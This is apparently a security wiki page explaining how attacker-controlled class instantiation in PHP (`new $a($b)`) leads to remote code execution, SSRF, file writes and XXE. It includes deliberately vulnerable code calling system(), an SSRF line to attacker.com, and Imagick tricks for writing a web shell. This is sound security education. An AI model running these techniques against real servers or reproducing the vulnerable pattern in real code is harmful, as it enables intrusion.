# PHP - RCE abusing object creation: new $\_GET\["a"]\($\_GET\["b"])
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## Introduction In the situation where you can create a new arbitrary object like `new $_GET["a"]($_GET["a"])`you might be able to obtain RCE, and [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) exposes different ways to get RCE. ## RCE via Custom Classes or Autoloading In the construction `new $a($b)`, the **variable `$a` stands for the class name** that the object will be created for, and the variable **`$b` stands for the first argument** that will be passed to the object’s constructor. If `$a` and `$b` come from GET/POST, they can be **strings or string arrays**. If they come from **JSON** or elsewhere, they **might have other types**, such as object or boolean. Let’s consider the following example: ```php class App { function __construct ($cmd) { system($cmd); } } # Additionally, in PHP < 8.0 a constructor might be defined using the name of the class class App2 { function App2 ($cmd) { system($cmd); } } # Vulnerable code $a = $_GET['a']; $b = $_GET['b']; new $a($b); ``` In this code, you can set `$a` to `App` or `App2` and `$b` to `uname -a`. After this, the command `uname -a` will be executed. When there are no such exploitable classes in your application, or you have the class needed in a separate file that isn’t included by the vulnerable code, you may take a look at autoloading functions. **Autoloading functions** are set by registering callbacks via `spl_autoload_register` or by defining `__autoload`. They are called when an instance of an unknown class is trying to be created. ```php # An example of an autoloading function spl_autoload_register(function ($class_name) { include './../classes/' . $class_name . '.php'; }); # An example of an autoloading function, works only in PHP < 8.0 function __autoload($class_name) { include $class_name . '.php'; }; # Calling spl_autoload_register with no arguments enables the default autoloading function, which includes lowercase($classname) + .php/.inc from include_path spl_autoload_register(); ``` Depending on the PHP version, and the code in the autoloading functions, some ways to get a Remote Code Execution via autoloading might exist. ## RCE via Built-In Classes When you don’t have custom classes and autoloading, you can rely on **built-in PHP classes only**. There are from 100 to 200 built-in PHP classes. The number of them depends on the PHP version and the extensions installed. All of built-in classes can be listed via the `get_declared_classes` function, together with the custom classes: ```php var_dump(get_declared_classes()); ``` Classes with useful constructors can be found via [the reflection API](https://www.php.net/manual/en/book.reflection.php). Displaying constructors and their parameters using the reflation API: [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF)\ ![](https://swarm.ptsecurity.com/wp-content/uploads/2022/07/2.png) If you control **multiple constructor parameters and can call arbitrary methods** afterwards, there are many ways to get a Remote Code Execution. But if you can pass **only one parameter and don’t have any calls** to the created object, there is **almost nothing**. I know of only three ways to get something from `new $a($b)`. ### **SSRF + Phar deserialization** The `SplFileObject` class implements a constructor that allows connection to any local or remote URL: ``` new SplFileObject('http://attacker.com/'); ``` This allows SSRF. Additionally, SSRFs in PHP < 8.0 could be turned into deserializations via techniques with the Phar protocol. ### **Exploiting PDOs** The PDO class has another interesting constructor: ```php new PDO("sqlite:/tmp/test.txt") ``` The `PDO` constructor accepts DSN strings, allowing us to **connect to any local or remote database** using **installed database extensions**. For example, the SQLite extension can create empty files. ### **SoapClient/SimpleXMLElement XXE** In PHP ≤ 5.3.22 and ≤ 5.4.12, the constructor of SoapClient was **vulnerable to XXE**. The constructor of SimpleXMLElement was vulnerable to XXE as well, but it required libxml2 < 2.9. ## RCE via Imagick Extension Checking the **dependencies** of the **project** you are trying to exploit you could find **new classes** that could be **abused to execute commands** creating a new object. In this case, **Imagick** was found to be useful for that purpose. ### VID parser The VID parser allows to write arbitrary content in an arbitrary path inside the filesystem, which would allow an attacker to write a PHPshell in an accessible folder from the web page and get RCE. ![](<../../../.gitbook/assets/image (157) (3).png>) #### VID Parser + FIle Upload When a file is uploaded to PHP it's temporary stored in `/tmp/phpXXXXXX` . The VID parser of Imagick with the **msl** protocol allows to **specify wildcards in the file paths** (so the temporary uploaded file can be easily accessed) and **copy it to any arbitrary location**.\ This is another way to get arbitrary file writing inside the filesystem: ![](<../../../.gitbook/assets/image (159).png>) ### PHP Crash + Brute Force The [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) explained another way to get RCE by **uploading files with specific content** and making the **server crash before it deletes** that file and then **bruteforcing the name** of the temporary file until **Imagick executes arbitrary PHP code**. However, apparently the **crash trick** discovered only **worked in an old version of ImageMagick**. ## References * [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
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